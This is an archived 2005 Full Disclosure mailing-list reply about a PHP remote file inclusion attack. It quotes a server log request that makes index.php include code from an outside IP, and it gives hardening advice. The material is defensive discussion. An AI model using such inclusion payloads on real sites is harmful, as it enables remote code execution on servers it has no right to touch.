Full Disclosure mailing list archives
Re: PHP Command/Safemode Exploit
From: Christopher Kunz <christopher.kunz () hardened-php net>
Date: Fri, 29 Jul 2005 23:02:52 +0200
Willem Koenings wrote:
hi, looks like CSE exploit is circulating again... found several queries today from server log anyone confirms? "GET /index.php?page=http://213.202.214.198/cse.gif? HTTP/1.1" 404 1035 "-" "Python-urllib/2.4"
Can't see anything new in there. The usual PHP exploit suite, which is very script kiddie compatible, but where do you suspect a new exploit? AFAICT, this is targetted to sites using stuff like
include($_GET['page']) as their action dispatch inside the script.If you filter user input correctly, there's absolutely nothing to worry. You might, however, want to check out the Hardening Patch for PHP (http://www.hardened-php.net/, shameless plug) which permits include() for any URL, or disable allow_url_fopen in php.ini.
Regards, --ck PS: The site with cse.gif on it is down now. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- PHP Command/Safemode Exploit Willem Koenings (Jul 29)
- Re: PHP Command/Safemode Exploit Christopher Kunz (Jul 29)
- Re: PHP Command/Safemode Exploit Christopher Kunz (Jul 29)
- Re: PHP Command/Safemode Exploit Willem Koenings (Jul 29)
- Re: PHP Command/Safemode Exploit Christopher Kunz (Jul 29)